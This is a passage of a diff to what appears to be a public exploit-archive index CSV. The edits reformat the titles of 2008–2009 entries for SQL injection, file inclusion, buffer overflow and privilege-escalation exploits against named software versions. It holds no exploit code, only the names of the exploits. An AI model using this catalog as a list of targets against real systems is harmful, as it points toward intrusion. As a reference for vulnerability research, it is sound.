Vuln",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 @@ -6277,12 +6277,12 @@ id,file,description,date,author,platform,type,port 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 (sql/xss) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 -6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit #2",2008-10-09,Sausage,php,webapps,0 +6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection Vulnerability",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download Vulnerability",2008-10-09,JosS,php,webapps,0 -6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ Proof of Concept (MS08-052) #2",2008-10-09,"John Smith",windows,dos,0 +6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 (load) Remote Crash Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0 @@ -6554,7 +6554,7 @@ id,file,description,date,author,platform,type,port 6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw <= 5.0 - Local/Remote File Inclusion Vulnerability",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit",2008-11-04,"Charles Fol",php,webapps,0 -6994,platforms/windows/local/6994.txt,"Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0 +6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages Vuln",2008-11-05,StAkeR,php,webapps,0 6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal (Tour.php id) SQL Injection Vulnerability",2008-11-05,G4N0K,php,webapps,0 @@ -6566,7 +6566,7 @@ id,file,description,date,author,platform,type,port 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability",2008-11-05,"Hussin X",php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection Vulnerability",2008-11-05,Cyber-Zone,php,webapps,0 -7006,platforms/windows/local/7006.txt,"Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit #2",2008-11-05,"Debasis Mohanty",windows,local,0 +7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit (2)",2008-11-05,"Debasis Mohanty",windows,local,0 7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks (recid) Remote SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings (Auth Bypass) SQL Injection Vulnerability",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script SQL Injection Vulnerability",2008-11-05,InjEctOr5,php,webapps,0 @@ -6583,7 +6583,7 @@ id,file,description,date,author,platform,type,port 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion Vulnerability",2008-11-06,"Vinod Sharma",php,webapps,0 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln",2008-11-06,Cyber-Zone,php,webapps,0 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete Vulnerability",2008-11-06,cOndemned,php,webapps,0 -7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0 +7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 - (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0 7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 - (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery (ctg) SQL Injection Vulnerability",2008-11-06,"Hussin X",php,webapps,0 @@ -6618,7 +6618,7 @@ id,file,description,date,author,platform,type,port 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (upload/xss) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln",2008-11-08,BugReport.IR,php,webapps,0 -7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 +7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Auth Bypass) SQL Injection Vuln",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload Vulnerability",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 - Insecure Cookie Handling Vuln",2008-11-08,Stack,php,webapps,0 @@ -6644,7 +6644,7 @@ id,file,description,date,author,platform,type,port 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate Remote File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 -7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0 +7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 - Multiple Buffer Overflow Vulnerabilities PoC (OSX)",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds Authentication Bypass Vulnerability",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0 @@ -7076,7 +7076,7 @@ id,file,description,date,author,platform,type,port 7533,platforms/windows/local/7533.txt,"PowerStrip < = 3.84 (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure Vulnerability",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0 -7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 +7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 @@ -7087,10 +7087,10 @@ id,file,description,date,author,platform,type,port 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + rce exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability",2008-12-22,boom3rang,php,webapps,0 -7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 +7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability",2008-12-22,"Jacobo Gimeno",php,webapps,0 -7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 +7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) Remote SQL Injection Vulnerability",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"RoundCube Webmail <= 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 @@ -7186,20 +7186,20 @@ id,file,description,date,author,platform,type,port 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability",2009-01-02,"Hamid Ebadi",multiple,local,0 7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 (rfi/lfi/xss) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 -7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 +7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 0 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 -7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 -7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 (lst File) Local Buffer overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 +7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 +7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 7653,platforms/php/webapps/7653.txt,"Webspell 4 (Auth Bypass) SQL Injection Vulnerability",2009-01-03,N/A,php,webapps,0 -7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 -7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2",2009-01-04,sCORPINo,windows,local,0 -7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3",2009-01-04,Houssamix,windows,local,0 +7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 +7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0 +7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0 7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 (search) Remote SQL Injection Vulnerability",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability",2009-01-04,SuB-ZeRo,php,webapps,0 -7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #4",2009-01-04,Stack,windows,local,0 -7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #5",2009-01-04,suN8Hclf,windows,local,0 +7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0 +7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0 @@ -7229,7 +7229,7 @@ id,file,description,date,author,platform,type,port 7689,platforms/php/webapps/7689.txt,"BlogHelper (common_db.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0 7690,platforms/php/webapps/7690.txt,"PollHelper (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0 7691,platforms/php/webapps/7691.php,"Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability",2009-01-07,irk4z,php,webapps,0 -7692,platforms/windows/local/7692.pl,"CoolPlayer BUILD 219 (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0 +7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0 7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0 @@ -7371,7 +7371,7 @@ id,file,description,date,author,platform,type,port 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 (CSRF/HTML Injection) Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 -7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0 +7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0 @@ -7613,7 +7613,7 @@ id,file,description,date,author,platform,type,port 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 -8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 +8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 (admin.php) No Authentication Vulnerability",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 @@ -7622,7 +7622,7 @@ id,file,description,date,author,platform,type,port 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router SMS XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey <= 2.9.7 HTTP DOUBLE SLASH Arbitrary File Disclosure Vuln",2009-02-23,"Michael Peselnik",multiple,remote,0 8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability",2009-02-23,K-159,php,webapps,0 -8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day",2009-02-23,"Guido Landi",windows,dos,0 +8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0day)",2009-02-23,"Guido Landi",windows,dos,0 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) Remote SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-24,Fireshot,php,webapps,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 @@ -7741,21 +7741,21 @@ id,file,description,date,author,platform,type,port 8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability",2009-03-17,Garry,php,webapps,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 (.ogg) Local Buffer Overflow Exploit (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0 -8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 -8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 (.pls) Local Stack overflow Exploit",2009-03-18,His0k4,windows,local,0 -8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 -8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 +8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 +8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack overflow Exploit",2009-03-18,His0k4,windows,local,0 +8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 - (.pls) Stack Overflow Exploit (2)",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 +8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 - (.m3u) Stack Overflow Exploit",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 8236,platforms/windows/local/8236.py,"Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)",2009-03-18,His0k4,windows,local,0 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Remote Arbitrary File Deletion Vulnerability",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection Vulnerability",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service Vulnerability",2009-03-19,"Juan Galiana Lara",multiple,dos,0 -8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 +8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/sql) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 -8246,platforms/windows/local/8246.pl,"Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 +8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server Command Execution Vulnerability (post auth)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 @@ -7789,12 +7789,12 @@ id,file,description,date,author,platform,type,port 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 -8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500",2009-03-24,"Black Security",windows,local,0 +8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection Vulnerability",2009-03-24,x0r,php,webapps,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 -8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day",2009-03-25,"Guido Landi",multiple,dos,0 +8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (0day)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution Exploit",2009-03-26,Osirys,php,webapps,0 @@ -7864,7 +7864,7 @@ id,file,description,date,author,platform,type,port 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection Vulnerability",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)",2009-04-06,n00b,windows,remote,80 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar (ItemId) Blind SQL Injection Vulnerability",2009-04-06,Lanti-Net,php,webapps,0 -8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2",2009-04-06,DATA_SNIPER,windows,dos,0 +8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 8358,platforms/windows/dos/8358.pl,"UltraISO <= 9.3.3.2685 .ui Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 @@ -7926,8 +7926,8 @@ id,file,description,date,author,platform,type,port 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 (XSS/DD) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 8419,platforms/windows/remote/8419.pl,"ftpdmin 0.96 Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)",2009-04-13,His0k4,windows,local,0 -8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]",2009-04-13,His0k4,windows,remote,8000 -8422,platforms/windows/remote/8422.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]",2009-04-13,His0k4,windows,remote,8000 +8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote 